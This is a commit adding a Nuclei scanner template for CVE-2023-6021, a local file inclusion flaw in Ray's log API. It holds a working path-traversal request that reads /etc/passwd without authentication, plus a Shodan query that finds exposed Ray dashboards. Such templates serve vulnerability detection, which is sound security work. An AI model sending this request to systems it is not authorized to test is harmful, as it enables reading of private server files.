Create CVE-2023-6021.yaml

http/cves/2023/CVE-2023-6021.yaml

@@ -0,0 +1,56 @@
+id: CVE-2023-6021
+
+info:
+  name: Ray API - Local File Inclusion
+  author: byt3bl33d3r
+  severity: high
+  description: |
+    LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.
+  reference:
+    - https://huntr.com/bounties/5039c045-f986-4cbc-81ac-370fe4b0d3f8/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-6021
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2023-6021
+    cwe-id: CWE-22,CWE-29
+    epss-score: 0.00087
+    epss-percentile: 0.35941
+    cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"Ray Dashboard"
+  tags: cve,cve2023,lfi,ray,oos
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/nodes?view=summary"
+      - "{{BaseURL}}/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_2
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header_2
+        words:
+          - "text/plain"
+          - "aiohttp"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body
+        internal: true
+        name: nodeid
+        json:
+          - '..|objects|.nodeId//empty[0]'